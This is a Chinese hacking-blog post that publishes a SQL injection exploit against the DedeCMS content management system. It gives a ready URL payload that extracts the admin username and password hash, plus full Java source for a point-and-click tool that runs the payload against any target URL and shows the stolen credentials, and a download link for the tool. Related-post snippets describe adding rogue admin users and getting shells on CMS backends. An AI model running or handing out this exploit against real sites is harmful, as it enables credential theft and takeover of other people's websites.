DedeCMS全版本通杀SQL注入漏洞利用代码及工具

hacker5年前黑客文章700

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

EXP:
Exp:
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

利用工具源码:
package org.javaweb.dede.ui;

import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
*
* @author yz
*/
public class MainFrame extends javax.swing.JFrame {

private static final long serialVersionUID = 1L;

/**
* Creates new form MainFrame
*/
public MainFrame() {
initComponents();
}

public String request(String url){
String str = "",tmp;
try {
BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
while((tmp=br.readLine())!=null){
str+=tmp+"\r\n";
}
} catch (Exception e) {
jTextArea1.setText(e.toString());
}
return str;
}

private void initComponents() {

jPanel1 = new javax.swing.JPanel();
jLabel1 = new javax.swing.JLabel();
jTextField1 = new javax.swing.JTextField();
jButton1 = new javax.swing.JButton();
jScrollPane1 = new javax.swing. *** crollPane();
jTextArea1 = new javax.swing.JTextArea();

setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);

jLabel1.setText("URL:");
jTextField1.setText("http://localhost");

this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");

int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);

jButton1.setText("获取");
jButton1.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
jButton1ActionPerformed(evt);
}
});

jTextArea1.setColumns(20);
jTextArea1.setRows(5);
jScrollPane1.setViewportView(jTextArea1);

javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(jTextField1,
javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jButton1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
);

javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);

pack();
}//

private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
String url = jTextField1.getText();
if(null==url||"".equals(url)){
return ;
}
String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
Matcher m = Pattern.compile("

(.*)

").matcher(result);
if(m.find()){
String[] s = m.group(1).split("\\|");
if(s.length>2){
jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
}
}
}

public static void main(String args[]) {
java.awt.EventQueue.invokeLater(new Runnable() {
public void run() {
new MainFrame().setVisible(true);
}
});
}

// Variables declaration - do not modify
private javax.swing.JButton jButton1;
private javax.swing.JLabel jLabel1;
private javax.swing.JPanel jPanel1;
private javax.swing. *** crollPane jScrollPane1;
private javax.swing.JTextArea jTextArea1;
private javax.swing.JTextField jTextField1;
// End of variables declaration
}
利用工具下载地址 http://pan.baidu.com/s/1sj31RLN (本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!)

标签: 黑客技术

相关文章

突破360防黑加固添加用户

突破360防黑加固添加用户

360功能多,现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹,提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xx...

hack学**方法教你怎么学黑客  分享8个强大的黑客技术学习网站

hack学**方法教你怎么学黑客  分享8个强大的黑客技术学习网站

黑客攻击是一项很难掌握的技能,在很大的程度上要求人们对计算机和软件架构的各种概念和网络系统有深入的了解,今天,分享8个道德黑客学习可以利用的网站       黑客主要有两种:黑帽黑客、白帽...

织梦网dedecms 0day

把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。 http://www.123.com/织梦网站后台/login....

帝国cms后台拿shell两种方法

第一种方法:  增加自定义页面 (6.0上实验成功) 模板管理–>增加自定义页面–>页面名称随便–>文件名:x.asp;.html–>页面内容–>小马...

UbertoothOne是一款开源系统手机蓝牙扫描仪嗅探器

UbertoothOne是一款开源系统手机蓝牙扫描仪嗅探器

Ubertooth One是一款开源系统手机蓝牙扫描仪嗅探器,当然,还可以扫描仪网络嗅探低能耗手机蓝牙,Ubertooth One是适用手机蓝牙试验的开源系统2.4 GHz无线网络软件开发平台。 手...

Cisco环境解决ARP欺骗问题

因为经常看到网上有看到求助ARP病毒防范办法,其实ARP欺骗原理简单,利用的是ARP协议的一个“缺陷”,免费ARP来达到欺骗主机上面的网关的ARP表项。 其实免费ARP当时设计出来是为了2个作用的...